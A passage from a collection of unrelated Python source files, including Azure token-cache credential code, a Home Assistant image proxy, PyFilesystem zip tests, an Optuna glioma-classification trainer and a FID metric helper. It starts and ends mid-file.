    ax.plot(k,P2/P0, '--', label='low filtered')
    plt.grid()
    plt.legend()
    # Panel 4: the spectra themselves on log-log axes.
    ax=plt.subplot(144)
    ax.set_yscale('log')
    ax.set_xscale('log')
    P1=filter_highk(k,P0,1,5)
    P2=filter_lowk(k,P0,.01,.05)
    ax.plot(k,P0, label='original')
    ax.plot(k,P1, label='high filtered')
    ax.plot(k,P2, '--', label='low filtered')
    plt.grid()
    plt.legend()
    plt.show()
import sys
if __name__ == "__main__":
    def plus_one(s):
        """Return str(int(s) + 1), logging the transformation to stderr."""
        ss = s.strip()
        sp1 = str(1 + int(ss))
        print(
            "(+1) {} => {}".format(ss, sp1),
            file=sys.stderr
        )
        return sp1

    # Echo each incoming line incremented by one; blank lines are skipped.
    # BUG FIX: exit cleanly when stdin closes instead of crashing with an
    # unhandled EOFError.
    while True:
        try:
            x = input()
        except EOFError:
            break
        if x:
            print(plus_one(x))
|
from flask import Flask
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import json
import sys
from tensorflow.keras.models import model_from_json
#path = os.path.join(sys.path[0], "log\DA_dnn_10-4.json")
#print(path)
# inputData = np.array([4,9,5,9.5,2.3,3.4,0,45])
def runDaylightPrediction(sideA,sideB,sideC,sideD,wWidth,wHeight,orient,area):
    """Predict a daylight-autonomy grid from room and window geometry.

    Loads the pre-trained CNN (architecture from DA_CNN.json, weights from
    DA_CNN.h5), feeds the eight scalar inputs as a (1, 8) array, and returns
    the (30, 31) prediction flattened to a flat list of 930 floats, flipped
    vertically for honeybee mesh recoloring.

    NOTE(review): model paths are relative to the process working
    directory — confirm callers run from the service root.
    """
    # Set current working directory
    #cwd = '/content/drive/MyDrive/Daylight Autonomy'
    #cwd = os.path.join(sys.path[0], "models/DA_CNN.json")
    #print("working directory")
    #print(cwd)
    print(os.getcwd())
    # Load CNN model
    json_file = open('model/tensorflow_model/models/DA_CNN.json', 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    loaded_model = model_from_json(loaded_model_json)
    print("loaded json")
    loaded_model.load_weights('model/tensorflow_model/models/DA_CNN.h5')
    # test case dictionary. Can be any list or array as long as the order is correct and is shaped to (1,8)
    """
    test_case = {
        'SideA': 4.7,
        'SideB': 8.0,
        'SideC': 6.0,
        'SideD': 9.52,
        'WindowWidth': 2.87,
        'WindowLength': 1.25,
        'Orientation': 45,
        'Area': 45
    }
    """
    inputs = [sideA,sideB,sideC,sideD,wWidth,wHeight,orient,area]
    # converting dictionary to 2D vector of size (1,8)
    input_data = np.array(inputs).reshape(1,-1)
    # predict input array, returns a 4D vector of size (1, 30, 31, 1)
    test_pred = loaded_model.predict(input_data)
    test_pred = test_pred.reshape(30,31)
    test_pred = np.flipud(test_pred)
    #test_pred = np.fliplr(test_pred)
    # reshape to 1D vector for honeybee to recolor mesh
    output = test_pred.ravel()
    return list(output)
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import time
from msal.application import PublicClientApplication
from azure.core.credentials import AccessToken
from azure.core.exceptions import ClientAuthenticationError
from .. import CredentialUnavailableError
from .._constants import AZURE_CLI_CLIENT_ID
from .._internal import AadClient
from .._internal.decorators import log_get_token, wrap_exceptions
from .._internal.msal_client import MsalClient
from .._internal.shared_token_cache import NO_TOKEN, SharedTokenCacheBase
try:
from typing import TYPE_CHECKING
except ImportError:
TYPE_CHECKING = False
if TYPE_CHECKING:
# pylint:disable=unused-import,ungrouped-imports
from typing import Any, Optional
from .. import AuthenticationRecord
from .._internal import AadClientBase
class SharedTokenCacheCredential(SharedTokenCacheBase):
    """Authenticates using tokens in the local cache shared between Microsoft applications.

    :param str username:
        Username (typically an email address) of the user to authenticate as. This is used when the local cache
        contains tokens for multiple identities.
    :keyword str authority: Authority of an Azure Active Directory endpoint, for example 'login.microsoftonline.com',
        the authority for Azure Public Cloud (which is the default). :class:`~azure.identity.AzureAuthorityHosts`
        defines authorities for other clouds.
    :keyword str tenant_id: an Azure Active Directory tenant ID. Used to select an account when the cache contains
        tokens for multiple identities.
    :keyword AuthenticationRecord authentication_record: an authentication record returned by a user credential such as
        :class:`DeviceCodeCredential` or :class:`InteractiveBrowserCredential`
    :keyword bool allow_unencrypted_cache: if True, the credential will fall back to a plaintext cache when encryption
        is unavailable. Defaults to False.
    """

    def __init__(self, username=None, **kwargs):
        # type: (Optional[str], **Any) -> None
        self._auth_record = kwargs.pop("authentication_record", None)  # type: Optional[AuthenticationRecord]
        if self._auth_record:
            # authenticate in the tenant that produced the record unless "tenant_id" specifies another
            self._tenant_id = kwargs.pop("tenant_id", None) or self._auth_record.tenant_id
            self._cache = kwargs.pop("_cache", None)
            self._app = None
            self._client_kwargs = kwargs
            # Deferred: _initialize() builds the MSAL app on first get_token call.
            self._initialized = False
        else:
            super(SharedTokenCacheCredential, self).__init__(username=username, **kwargs)

    @log_get_token("SharedTokenCacheCredential")
    def get_token(self, *scopes, **kwargs):  # pylint:disable=unused-argument
        # type: (*str, **Any) -> AccessToken
        """Get an access token for `scopes` from the shared cache.

        If no access token is cached, attempt to acquire one using a cached refresh token.

        .. note:: This method is called by Azure SDK clients. It isn't intended for use in application code.

        :param str scopes: desired scopes for the access token. This method requires at least one scope.
        :rtype: :class:`azure.core.credentials.AccessToken`
        :raises ~azure.identity.CredentialUnavailableError: the cache is unavailable or contains insufficient user
            information
        :raises ~azure.core.exceptions.ClientAuthenticationError: authentication failed. The error's ``message``
            attribute gives a reason.
        """
        if not scopes:
            raise ValueError("'get_token' requires at least one scope")
        if not self._initialized:
            self._initialize()
        if not self._cache:
            raise CredentialUnavailableError(message="Shared token cache unavailable")
        if self._auth_record:
            # AuthenticationRecord path: delegate silent acquisition to MSAL.
            return self._acquire_token_silent(*scopes)
        account = self._get_account(self._username, self._tenant_id)
        token = self._get_cached_access_token(scopes, account)
        if token:
            return token
        # try each refresh token, returning the first access token acquired
        for refresh_token in self._get_refresh_tokens(account):
            token = self._client.obtain_token_by_refresh_token(scopes, refresh_token)
            return token
        raise CredentialUnavailableError(message=NO_TOKEN.format(account.get("username")))

    def _get_auth_client(self, **kwargs):
        # type: (**Any) -> AadClientBase
        # Use the Azure CLI client id so cached CLI tokens are usable.
        return AadClient(client_id=AZURE_CLI_CLIENT_ID, **kwargs)

    def _initialize(self):
        """Load the cache and (AuthenticationRecord path only) build the MSAL app."""
        if self._initialized:
            return
        if not self._auth_record:
            super(SharedTokenCacheCredential, self)._initialize()
            return
        self._load_cache()
        if self._cache:
            self._app = PublicClientApplication(
                client_id=self._auth_record.client_id,
                authority="https://{}/{}".format(self._auth_record.authority, self._tenant_id),
                token_cache=self._cache,
                http_client=MsalClient(**self._client_kwargs),
            )
        self._initialized = True

    @wrap_exceptions
    def _acquire_token_silent(self, *scopes, **kwargs):
        # type: (*str, **Any) -> AccessToken
        """Silently acquire a token from MSAL. Requires an AuthenticationRecord."""
        result = None
        accounts_for_user = self._app.get_accounts(username=self._auth_record.username)
        if not accounts_for_user:
            raise CredentialUnavailableError("The cache contains no account matching the given AuthenticationRecord.")
        for account in accounts_for_user:
            if account.get("home_account_id") != self._auth_record.home_account_id:
                continue
            # Take the timestamp before the request so expires_on errs on the early side.
            now = int(time.time())
            result = self._app.acquire_token_silent_with_error(list(scopes), account=account, **kwargs)
            if result and "access_token" in result and "expires_in" in result:
                return AccessToken(result["access_token"], now + int(result["expires_in"]))
        # if we get this far, the cache contained a matching account but MSAL failed to authenticate it silently
        if result:
            # cache contains a matching refresh token but STS returned an error response when MSAL tried to use it
            message = "Token acquisition failed"
            details = result.get("error_description") or result.get("error")
            if details:
                message += ": {}".format(details)
            raise ClientAuthenticationError(message=message)
        # cache doesn't contain a matching refresh (or access) token
        raise CredentialUnavailableError(message=NO_TOKEN.format(self._auth_record.username))
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from torch import nn
from flash.core.optimizers import LAMB, LARS, LinearWarmupCosineAnnealingLR
@pytest.mark.parametrize(
    "optim_fn, lr, kwargs",
    [
        (LARS, 0.1, {}),
        (LARS, 0.1, {"weight_decay": 0.001}),
        (LARS, 0.1, {"momentum": 0.9}),
        (LAMB, 1e-3, {}),
        (LAMB, 1e-3, {"amsgrad": True}),
        (LAMB, 1e-3, {"weight_decay": 0.001}),
    ],
)
def test_optim_call(tmpdir, optim_fn, lr, kwargs):
    """Smoke test: each optimizer configuration completes several steps."""
    layer = nn.Linear(10, 1)
    optimizer = optim_fn(layer.parameters(), lr=lr, **kwargs)
    # Ten forward/backward/step cycles on random single-sample batches.
    for _ in range(10):
        dummy_input = torch.rand(1, 10)
        dummy_input.requires_grad = True
        result = layer(dummy_input)
        result.backward()
        optimizer.step()
@pytest.mark.parametrize("optim_fn, lr", [(LARS, 0.1), (LAMB, 1e-3)])
def test_optim_with_scheduler(tmpdir, optim_fn, lr):
    """Smoke test: optimizers cooperate with the warmup/cosine scheduler."""
    max_epochs = 10
    layer = nn.Linear(10, 1)
    optimizer = optim_fn(layer.parameters(), lr=lr)
    scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=2, max_epochs=max_epochs)
    # One optimizer step plus one scheduler step per "epoch".
    for _ in range(max_epochs):
        dummy_input = torch.rand(1, 10)
        dummy_input.requires_grad = True
        result = layer(dummy_input)
        result.backward()
        optimizer.step()
        scheduler.step()
|
from __future__ import annotations
from aiohttp import web, ClientSession
from homeassistant.core import HomeAssistant
from homeassistant.helpers.typing import ConfigType
from homeassistant.components.http import KEY_AUTHENTICATED, HomeAssistantView
import logging
_LOGGER = logging.getLogger(__name__)
DOMAIN = "imageproxy"
def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Set up the imageproxy component by registering its HTTP view.

    NOTE(review): despite the ``async_`` name this is a plain function —
    confirm Home Assistant accepts a non-coroutine ``async_setup`` here.
    """
    hass.http.register_view(imageproxy(config['imageproxy']))
    # BUG FIX: Home Assistant treats a falsy return value as a failed
    # setup; the missing return previously marked the component as
    # not loaded even though the view was registered.
    return True
class imageproxy(HomeAssistantView):
    """HTTP view that proxies configured image resources.

    Serves ``/imageproxy/<image>`` by fetching the URL configured under
    ``resources[image]`` and relaying the body and content type.
    """

    url = "/imageproxy/{image}"
    name = "api:imageproxy:image"
    # Auth is enforced manually in get() so a query-string access token can
    # substitute for Home Assistant authentication.
    requires_auth = False

    def __init__(self, config: ConfigType) -> None:
        self.config = config

    async def get(self, request: web.Request, image: str) -> web.StreamResponse:
        """Fetch and relay the configured image; 401 unauthorized, 500 on failure."""
        # Allow either an authenticated HA session or a known access token.
        if not request[KEY_AUTHENTICATED] and request.query.get("token") not in self.config['accesstokens']:
            raise web.HTTPUnauthorized()
        try:
            async with ClientSession() as session:
                async with session.get(self.config['resources'][image]) as resp:
                    return web.Response(body=await resp.content.read(), content_type=resp.content_type)
        except Exception as e:
            # Best-effort proxy: log and return a generic 500 rather than
            # propagating upstream errors to the client.
            _LOGGER.error(e)
            return web.Response(status=500)
"""The mqtt_json component."""
|
# -*- coding: utf-8 -*-
class CCSDKException(Exception):
    """Root of the CC SDK exception hierarchy."""
class CCSDKInvalidParamException(CCSDKException):
    """Raised when a caller supplies an invalid parameter to the SDK."""
class CCServerException(CCSDKException):
    """Raised when the CC server reports an error response."""
|
from abc import ABC
from pycurb.time_rule import TimeRule
from pycurb.utils import to_camelcase
class PyCurbObject(ABC):
    """Base class for objects that (de)serialize to camelCase-keyed dicts."""

    # Subclasses list their snake_case attribute names here.
    fields = []

    @classmethod
    def from_dict(cls, d):
        """Build an instance from a camelCase-keyed dict ``d``.

        Missing keys become None keyword arguments.
        """
        kwargs = {}
        for a in cls.fields:
            kwargs[a] = d.get(to_camelcase(a))
        return cls(**kwargs)

    def to_dict(self, sub_class):
        """Serialize to a camelCase-keyed dict, omitting None attributes.

        :param sub_class: class whose ``fields`` drives the serialization
        """
        d = {}
        for f in sub_class.fields:
            obj = self.__getattribute__(f)
            if obj is not None:
                ccf = to_camelcase(f)
                # Nested PyCurbObject/TimeRule values are serialized
                # recursively; plain values pass through unchanged.
                if isinstance(obj, list):
                    d[ccf] = [
                        x.to_dict() if isinstance(x, (PyCurbObject,
                                                      TimeRule)) else x
                        for x in obj
                    ]
                else:
                    d[ccf] = obj.to_dict() if isinstance(
                        obj, (PyCurbObject, TimeRule)) else obj
        return d

    def add_list(self, name, list_attr):
        """Set attribute ``name`` to ``list_attr`` coerced to a list.

        Falsy values are ignored; sets/tuples are converted; a scalar is
        wrapped in a single-element list.
        """
        if list_attr:
            if isinstance(list_attr, (set, tuple)):
                list_attr = list(list_attr)
            if not isinstance(list_attr, list):
                list_attr = [list_attr]
            self.__setattr__(name, list_attr)
|
# CacheIntervals: Memoization with interval parameters
#
# Copyright (C) Cyril Godart
#
# This file is part of CacheIntervals.
#
# @author = 'Cyril Godart'
# @email = 'cyril.godart@gmail.com'
name = 'CacheIntervals'
import sys
sys.path.append('.')
from .MemoizationIntervals import MemoizationWithIntervals |
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
|
# -*- encoding: UTF-8
from __future__ import unicode_literals
import os
import sys
import tempfile
import unittest
import zipfile
import six
from fs import zipfs
from fs.compress import write_zip
from fs.opener import open_fs
from fs.opener.errors import NotWriteable
from fs.test import FSTestCases
from fs.enums import Seek, ResourceType
from .test_archives import ArchiveTestCases
class TestWriteReadZipFS(unittest.TestCase):
def setUp(self):
fh, self._temp_path = tempfile.mkstemp()
def tearDown(self):
os.remove(self._temp_path)
def test_unicode_paths(self):
# https://github.com/PyFilesystem/pyfilesystem2/issues/135
with zipfs.ZipFS(self._temp_path, write=True) as zip_fs:
zip_fs.settext("Файл", "some content")
with zipfs.ZipFS(self._temp_path) as zip_fs:
paths = list(zip_fs.walk.files())
for path in paths:
self.assertIsInstance(path, six.text_type)
with zip_fs.openbin(path) as f:
f.read()
class TestWriteZipFS(FSTestCases, unittest.TestCase):
    """
    Test ZIPFS implementation.
    When writing, a ZipFS is essentially a TempFS.
    """

    def make_fs(self):
        # Keep a handle on the backing temp file so destroy_fs can drop it.
        _zip_file = tempfile.TemporaryFile()
        fs = zipfs.ZipFS(_zip_file, write=True)
        fs._zip_file = _zip_file
        return fs

    def destroy_fs(self, fs):
        fs.close()
        del fs._zip_file
class TestReadZipFS(ArchiveTestCases, unittest.TestCase):
    """
    Test Reading zip files.
    """
    def compress(self, fs):
        # Serialize the fixture filesystem into a fresh temporary zip file.
        fh, self._temp_path = tempfile.mkstemp()
        os.close(fh)
        write_zip(fs, self._temp_path)
    def load_archive(self):
        # Reopen the archive written by compress() for reading.
        return zipfs.ZipFS(self._temp_path)
    def remove_archive(self):
        os.remove(self._temp_path)
    def test_large(self):
        # A file larger than a single read buffer must round-trip intact,
        # via both read() and read1(), with and without an explicit size.
        test_fs = open_fs("mem://")
        test_fs.setbytes("test.bin", b"a" * 50000)
        write_zip(test_fs, self._temp_path)
        self.fs = self.load_archive()
        with self.fs.openbin("test.bin") as f:
            self.assertEqual(f.read(), b"a" * 50000)
        with self.fs.openbin("test.bin") as f:
            self.assertEqual(f.read(50000), b"a" * 50000)
        with self.fs.openbin("test.bin") as f:
            self.assertEqual(f.read1(), b"a" * 50000)
        with self.fs.openbin("test.bin") as f:
            self.assertEqual(f.read1(50000), b"a" * 50000)
    def test_getinfo(self):
        super(TestReadZipFS, self).test_getinfo()
        top = self.fs.getinfo("top.txt", ["zip"])
        if sys.platform in ("linux", "darwin"):
            # create_system 3 identifies a UNIX-created archive entry.
            self.assertEqual(top.get("zip", "create_system"), 3)
    def test_openbin(self):
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.name, "top.txt")
        # Seeking before the start or past the end must be rejected.
        with self.fs.openbin("top.txt") as f:
            self.assertRaises(ValueError, f.seek, -2, Seek.set)
        with self.fs.openbin("top.txt") as f:
            self.assertRaises(ValueError, f.seek, 2, Seek.end)
        with self.fs.openbin("top.txt") as f:
            # 5 is not a valid whence value.
            self.assertRaises(ValueError, f.seek, 0, 5)
    def test_read(self):
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.read(), b"Hello, World")
        with self.fs.openbin("top.txt") as f:
            # Partial reads continue from the current position.
            self.assertEqual(f.read(5), b"Hello")
            self.assertEqual(f.read(7), b", World")
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.read(12), b"Hello, World")
    def test_read1(self):
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.read1(), b"Hello, World")
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.read1(5), b"Hello")
            self.assertEqual(f.read1(7), b", World")
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.read1(12), b"Hello, World")
    def test_seek_set(self):
        # tell() must track reads and absolute seeks precisely.
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read(), b"Hello, World")
            self.assertEqual(f.tell(), 12)
            self.assertEqual(f.read(), b"")
            self.assertEqual(f.tell(), 12)
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read1(), b"Hello, World")
            self.assertEqual(f.tell(), 12)
            self.assertEqual(f.seek(1), 1)
            self.assertEqual(f.tell(), 1)
            self.assertEqual(f.read(), b"ello, World")
            self.assertEqual(f.tell(), 12)
            self.assertEqual(f.seek(7), 7)
            self.assertEqual(f.tell(), 7)
            self.assertEqual(f.read(), b"World")
            self.assertEqual(f.tell(), 12)
    def test_seek_current(self):
        # Relative seeks move from the current position; negative offsets
        # that would go before the start are rejected.
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read(5), b"Hello")
            self.assertEqual(f.tell(), 5)
            self.assertEqual(f.seek(2, Seek.current), 7)
            self.assertEqual(f.read1(), b"World")
            self.assertEqual(f.tell(), 12)
            self.assertEqual(f.seek(-1, Seek.current), 11)
            self.assertEqual(f.read(), b"d")
        with self.fs.openbin("top.txt") as f:
            self.assertRaises(ValueError, f.seek, -1, Seek.current)
    def test_seek_end(self):
        # Seeks relative to the end of the 12-byte payload.
        with self.fs.openbin("top.txt") as f:
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.seek(-12, Seek.end), 0)
            self.assertEqual(f.read1(5), b"Hello")
            self.assertEqual(f.seek(-7, Seek.end), 5)
            self.assertEqual(f.seek(-5, Seek.end), 7)
            self.assertEqual(f.read(), b"World")
class TestReadZipFSMem(TestReadZipFS):
    # Same read tests as TestReadZipFS, but the source tree is built in an
    # in-memory filesystem before being compressed.
    def make_source_fs(self):
        return open_fs("mem://")
class TestDirsZipFS(unittest.TestCase):
    def test_implied(self):
        """Test zipfs creates intermediate directories."""
        handle, path = tempfile.mkstemp("testzip.zip")
        try:
            os.close(handle)
            with zipfile.ZipFile(path, mode="w") as archive:
                # Only the leaf entry is written; ancestors are implied.
                archive.writestr("foo/bar/baz/egg", b"hello")
            with zipfs.ReadZipFS(path) as zip_fs:
                # Each implied ancestor directory must be resolvable.
                top_info = zip_fs.getinfo("foo", ["details"])
                zip_fs.getinfo("foo/bar")
                zip_fs.getinfo("foo/bar/baz")
                self.assertTrue(top_info.is_dir)
                self.assertTrue(zip_fs.isfile("foo/bar/baz/egg"))
        finally:
            os.remove(path)
class TestOpener(unittest.TestCase):
    def test_not_writeable(self):
        # The "zip://" opener only supports reading; requesting a writeable
        # filesystem must fail up front with NotWriteable.
        with self.assertRaises(NotWriteable):
            open_fs("zip://foo.zip", writeable=True)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 3 10:07:36 2020
This script is for detection IDH and TERTp mutation in gliomas.
1D-CNN is the approach that we use in this study.
This study was submitted to ISMRM 2021
Abdullah BAS
abdullah.bas@boun.edu.tr
BME Bogazici University
Istanbul / Uskudar
@author: abas
"""
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import numpy as np
import optuna
import exceLoader
import config
from matplotlib import pyplot as plt
from torch.utils.data import Dataset, DataLoader
from model1DCNN import Net
# Compute device (cpu/cuda) shared by all functions in this module.
device=config.device
def get_data_loaders(train_batch_size, test_batch_size):
    """Build the train/test DataLoader pair from the spreadsheet datasets.

    Args:
        train_batch_size (int): Training batch size (see config.py).
        test_batch_size (int): Evaluation batch size (see config.py).

    Returns:
        tuple: (train_loader, test_loader) DataLoader instances.
    """
    # responseCol=820: the label column index passed to the exceLoader
    # dataset (assumed from the call signature — TODO confirm in exceLoader).
    train_set = exceLoader.dataset(config.train_path, responseCol=820, preprocess=True)
    test_set = exceLoader.dataset(config.test_path, responseCol=820, preprocess=True, phase='test')
    # Shuffle only the training data; evaluation order stays deterministic.
    train_loader = DataLoader(train_set, batch_size=train_batch_size, shuffle=True)
    test_loader = DataLoader(test_set, batch_size=test_batch_size, shuffle=False)
    return train_loader, test_loader
def train(log_interval, model, train_loader, optimizer, epoch):
    """Run one training epoch and collect the per-batch losses.

    Args:
        log_interval (int): Print progress every `log_interval` batches.
        model (nn.Module): 1D-CNN model created via model1DCNN.py.
        train_loader (DataLoader): Training data loader yielding
            (age, data, target) triples.
        optimizer (torch.optim.Optimizer): Optimizer to step.
        epoch (int): Current epoch number (used for logging only).

    Returns:
        list: Loss value (float) for every batch of the epoch.
    """
    model.train()
    # CrossEntropyLoss is stateless, so one instance serves every batch.
    criterion = nn.CrossEntropyLoss()
    batch_losses = []
    for batch_idx, (age, data, target) in enumerate(train_loader):
        optimizer.zero_grad()
        output = model(data.to(device), age.to(device))
        loss = criterion(output, target.to(device))
        loss.backward()
        optimizer.step()
        batch_losses.append(loss.item())
        if batch_idx % log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.dataset),
                100. * batch_idx / len(train_loader), loss.item()))
    return batch_losses
def test(model, test_loader):
    """Evaluation loop for optuna.

    Args:
        model (torch.model): model to evaluate
        test_loader (dataloader): dataloader for testing, yielding
            (age, data, target) triples

    Returns:
        accuracy [float]: overall accuracy (percent)
        acc1 [float]: accuracy of class 0 (percent)
        acc2 [float]: accuracy of class 1 (percent)
        losses [list]: per-batch loss tensors
    """
    model.eval()
    test_loss = 0 # initializing the required variables
    correct = 0
    num_classes=[0,0]
    num_samples=[0,0]
    losses=[]
    with torch.no_grad():
        for age, data, target in test_loader:
            output = model(data.to(device),age.to(device))
            criterion = nn.CrossEntropyLoss()
            test_loss=criterion(output, target.to(device)) # loss of the current batch (overwritten each iteration, not summed)
            pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
            losses.append(test_loss)
            # Per-class bookkeeping: num_classes counts correct predictions,
            # num_samples counts occurrences, indexed by the true label.
            for i,_ in enumerate(pred):
                if pred[i]==target[i]:
                    num_classes[target[i]]+=1
                num_samples[target[i]]+=1
            correct += pred.eq(target.to(device).view_as(pred)).sum().item()
    accuracy = 100. * correct / len(test_loader.dataset) # computing the accuracy
    # NOTE(review): raises ZeroDivisionError if a class never appears in the
    # test set — presumably both classes are always present; verify.
    acc1=100.*num_classes[0]/num_samples[0] # computing the class-wise accuracies
    acc2=100.*num_classes[1]/num_samples[1]
    # The reported "Average loss" is actually the last batch's loss.
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(test_loader.dataset),
        100. * correct / len(test_loader.dataset)))
    print(f'Acc1:{acc1}/{num_samples[0]} , Acc2:{acc2}/{num_samples[1]}')
    return accuracy,acc1,acc2,losses
def train_optuna(trial):
    """This function is for optimizing the hyperparameters.

    Args:
        trial (optuna.study): This comes from optuna. Initialized study

    Returns:
        test_loss [float]: Test loss value (first batch of the last epoch).
            In this study optuna tries to minimize this value.
    """
    global best_booster # to find best model to save
    # creating the optimization parameters.
    # manipulation can be done with changing cfg parameters
    cfg = { 'device' : config.device,
            'train_batch_size' : config.train_batch_size,
            'test_batch_size' : config.test_batch_size,
            'n_epochs' :trial.suggest_categorical('epochs',[50,60,100,500]),
            'seed' : config.seed,
            'log_interval' : 1,
            'save_model' : False,
            'lr' : trial.suggest_loguniform('lr', 1e-5, 1e-2),
            'momentum': trial.suggest_uniform('momentum', 0.1, 0.99),
            'optimizer': trial.suggest_categorical('optimizer',[optim.SGD, optim.RMSprop]),
            'activation': trial.suggest_categorical('activation',[F.relu,F.sigmoid,F.leaky_relu])}
    torch.manual_seed(cfg['seed']) # for reproducibility
    train_loader, test_loader = get_data_loaders(cfg['train_batch_size'], cfg['test_batch_size'])
    model = Net(cfg['activation']).to(device) # model defining
    optimizer = cfg['optimizer'](model.parameters(), lr=cfg['lr']) # optimizer defining
    losses_train=[]
    losses_test=[]
    accuracies=[]
    for epoch in range(1, cfg['n_epochs'] + 1):
        loss_train=train(cfg['log_interval'], model, train_loader, optimizer, epoch) # function train
        test_accuracy,acc1,acc2,test_loss = test(model, test_loader) # function test (test_loss is the per-batch loss list)
        losses_train.append(loss_train)
        losses_test.append(test_loss)
        tester=test_accuracy # NOTE(review): unused local, kept as-is
        accuracies.append(test_accuracy)
        # Save a checkpoint whenever the first test batch's loss beats the
        # best seen so far across all trials (best_booster is module-global).
        if test_loss[0]<best_booster:
            # checkpoint is for loading and saving the hyperparameters
            checkpoint = {'model': Net(cfg['activation']),
                      'state_dict': model.state_dict(),
                      'optimizer' : optimizer.state_dict(),
                      'epochs':epoch,
                      'activation':cfg['activation'],
                      'lr':cfg['lr'],
                      'batch_size':cfg['train_batch_size'],
                      'acc1': acc1,
                      'acc2':acc2,
                      'optimizerName':cfg['optimizer'],
                      'test_loss':losses_test,
                      'train_loss':losses_train,
                      'accuracies': accuracies
                      }
            torch.save(checkpoint, f'{config.output}/PRTERT_Mut_{test_accuracy}.pth') # saving the model parameters
            best_booster=test_loss[0]
    return test_loss[0]
# Sentinel "best loss so far"; any realistic first-batch loss will be lower.
best_booster=110
if __name__ == '__main__':
    sampler = optuna.samplers.TPESampler()
    study = optuna.create_study(sampler=sampler, direction='minimize') # loss value is the value that we want to minimize
    study.optimize(func=train_optuna, n_trials=50)
    df=study.trials_dataframe() # converting study to dataframe
    study.best_trial
    optuna.visualization.plot_parallel_coordinate(study,params=['lr','momentum']) # plotting the parameters using a parallel-coordinates plot
|
import numpy as np
import torch
import torch.nn as nn
from scipy import linalg
from tqdm import tqdm
from basicsr.archs.inception import InceptionV3
def load_patched_inception_v3(device='cuda',
                              resize_input=True,
                              normalize_input=False):
    """Build an InceptionV3 feature extractor wrapped in DataParallel.

    We may not resize the input, but [rosinality/stylegan2-pytorch] does
    resize it; resizing is therefore configurable and defaults to True.

    Args:
        device (str): Device to place the model on. Default: 'cuda'.
        resize_input (bool): Forwarded to InceptionV3. Default: True.
        normalize_input (bool): Forwarded to InceptionV3. Default: False.

    Returns:
        nn.DataParallel: The wrapped InceptionV3 model in eval mode.
    """
    model = InceptionV3([3],
                        resize_input=resize_input,
                        normalize_input=normalize_input)
    return nn.DataParallel(model).eval().to(device)
@torch.no_grad()
def extract_inception_features(data_generator,
                               inception,
                               len_generator=None,
                               device='cuda'):
    """Extract inception features.

    Args:
        data_generator (generator): A data generator yielding image batches.
        inception (nn.Module): Inception model.
        len_generator (int): Length of the data_generator, used only to
            size the progressbar. Default: None (no progressbar).
        device (str): Device. Default: cuda.

    Returns:
        Tensor: Extracted features for all batches, concatenated on CPU.
    """
    progress = None
    if len_generator is not None:
        progress = tqdm(total=len_generator, unit='batch', desc='Extract')
    collected = []
    for batch in data_generator:
        if progress:
            progress.update(1)
        batch = batch.to(device)
        # Flatten each sample's feature map to a single row.
        flat = inception(batch)[0].view(batch.shape[0], -1)
        collected.append(flat.to('cpu'))
    if progress:
        progress.close()
    return torch.cat(collected, 0)
def calculate_fid(mu1, sigma1, mu2, sigma2, eps=1e-6):
    """Numpy implementation of the Frechet Distance.

    The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
    and X_2 ~ N(mu_2, C_2) is
        d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).

    Stable version by Dougal J. Sutherland.

    Args:
        mu1 (np.array): The sample mean over activations.
        sigma1 (np.array): The covariance matrix over activations for
            generated samples.
        mu2 (np.array): The sample mean over activations, precalculated on an
            representative data set.
        sigma2 (np.array): The covariance matrix over activations,
            precalculated on an representative data set.
        eps (float): Offset added to the covariance diagonals when their
            product is close to singular. Default: 1e-6.

    Returns:
        float: The Frechet Distance.
    """
    assert mu1.shape == mu2.shape, 'Two mean vectors have different lengths'
    assert sigma1.shape == sigma2.shape, (
        'Two covariances have different dimensions')
    cov_sqrt, _ = linalg.sqrtm(sigma1 @ sigma2, disp=False)
    # Product might be almost singular
    if not np.isfinite(cov_sqrt).all():
        # Fix: this message was a plain string, so "{eps}" printed literally;
        # it must be an f-string to interpolate the actual offset value.
        print(f'Product of cov matrices is singular. Adding {eps} to diagonal '
              'of cov estimates')
        offset = np.eye(sigma1.shape[0]) * eps
        cov_sqrt = linalg.sqrtm((sigma1 + offset) @ (sigma2 + offset))
    # Numerical error might give slight imaginary component
    if np.iscomplexobj(cov_sqrt):
        if not np.allclose(np.diagonal(cov_sqrt).imag, 0, atol=1e-3):
            m = np.max(np.abs(cov_sqrt.imag))
